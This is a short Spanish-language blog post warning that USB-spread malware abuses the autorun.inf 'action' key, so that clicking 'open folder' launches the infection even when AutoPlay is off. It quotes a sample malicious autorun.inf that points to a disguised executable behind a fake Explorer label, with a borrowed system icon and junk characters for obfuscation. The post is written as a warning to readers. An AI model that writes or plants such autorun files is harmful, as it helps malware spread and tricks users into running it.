Los autorun del nuestro pendrive vuelven a la carga
Hasta hace poco la forma más fácil de evitar que nos infectáramos con malware que pudiera estar en un pendrive era desactivar el AutoPlay de windows, esto hacia que no se ejecutara ningún autorun maligno en nuestro pc, y digo hasta hace poco porque los del lado oscuro vuelven a la carga, y esta vez le dan una vuelta de tuerca a la forma de propagarse por nuestros queridos dispositivos de almacenamiento (iPods y otros MP3 players, memorias flash, pendrives USB, cámaras digitales y portarretratos digitales y otros).
Ahora usan ActionKey en los AutoRun.Inf, con ello consiguen que al ejecutar Abrir la Carpeta para ver los archivos se ejecute el bichito.
Ejemplo de código en autorun:
[autorun]
:jmpO
open=winamp_cache_001/ehtumbs.exe
:nop
icon=%system%\SHELL32.dll,4
; (garbage characters)
action=abrir carpeta usando explorer de windows
; (garbage characters)
shell\\\\\open\\\\\winamp_cache_001/ehtumbs.exe
shell\\\\\explore\\\\\winamp_cache_001/ehtumbs.exe
useautoplay=1
[AutoRun]
; (garbage characters)
:GOTO NUL
Bueno chicos a tener cuidado y extremar las precauciones.
Un saludo.